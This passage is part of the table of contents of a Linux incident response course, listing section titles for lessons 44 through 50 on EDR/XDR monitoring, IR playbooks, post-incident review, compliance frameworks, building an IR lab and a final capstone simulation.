44.5 Unified Threat Detection Approaches
44.6 Hybrid Network Forensics
44.7 Case Studies of Hybrid Incidents
44.8 IR Policy Adaptation for Hybrid Environments
44.9 Tools for Hybrid IR Visibility
44.10 Hands-On: Hybrid IR Exercise

Lesson 45: Linux Security Monitoring with EDR/XDR

45.1 Endpoint Detection and Response Overview
45.2 EDR Capabilities for Linux
45.3 Extended Detection and Response (XDR) Concepts
45.4 Agent-Based Monitoring for Linux Hosts
45.5 Detecting Advanced Persistence
45.6 Automated Containment with EDR
45.7 Integrating Linux EDR with SIEM
45.8 Evaluating EDR Solutions for Linux
45.9 Case Study: EDR Detecting Linux Malware
45.10 Hands-On: EDR Alert Investigation

Lesson 46: Building an IR Playbook for Linux

46.1 Importance of Playbooks in IR
46.2 Components of a Linux IR Playbook
46.3 Standard Operating Procedures (SOPs)
46.4 Decision Trees for Incident Types
46.5 Automation Integration in Playbooks
46.6 Testing and Updating Playbooks
46.7 Playbook Customization by Industry
46.8 Sharing Playbooks with Teams
46.9 Lessons from Failed Playbooks
46.10 Hands-On: Create a Linux IR Playbook

Lesson 47: Post-Incident Activities and Lessons Learned

47.1 Incident Review Process
47.2 Identifying Root Causes
47.3 Gap Analysis in IR Processes
47.4 Updating Linux Security Policies
47.5 Training Needs Identification
47.6 Strengthening Preventive Controls
47.7 Updating Threat Intelligence Feeds
47.8 Improving Collaboration Post-Incident
47.9 Building a Continuous Improvement Loop
47.10 Hands-On: Lessons Learned Workshop

Lesson 48: Linux Security Compliance and Standards

48.1 Common Compliance Frameworks (ISO, NIST, CIS)
48.2 PCI DSS and Linux Servers
48.3 HIPAA Compliance in Linux Environments
48.4 GDPR Data Protection and Linux Systems
48.5 Audit Readiness in Linux IR
48.6 Compliance-Driven Logging Requirements
48.7 Security Benchmarks for Linux (CIS Benchmarks)
48.8 Mapping IR Activities to Compliance Controls
48.9 Case Studies of Compliance Failures
48.10 Practical Lab: Compliance Checklist

Lesson 49: Building a Linux IR Lab Environment

49.1 Requirements for an IR Lab
49.2 Virtual Machines for Testing
49.3 Network Simulation for Attacks
49.4 Setting Up Linux Targets
49.5 Deploying Monitoring Tools
49.6 Simulating Attacks in Lab
49.7 Collecting Evidence from Lab Incidents
49.8 Testing Playbooks in Lab
49.9 Red vs Blue Team Exercises
49.10 Hands-On: Build Your Own IR Lab

Lesson 50: Final Capstone: Comprehensive Linux IR Simulation

50.1 Simulated Linux Compromise Scenario
50.2 Evidence Acquisition Phase
50.3 Log Analysis and Threat Hunting
50.4 Malware Detection in Linux Host
50.5 Rootkit Investigation
50.6 Data Exfiltration Analysis
50.7 Containment and Eradication Actions
50.8 Recovery of Affected Systems
50.9 Post-Incident Documentation
50.10 Capstone Project Presentation
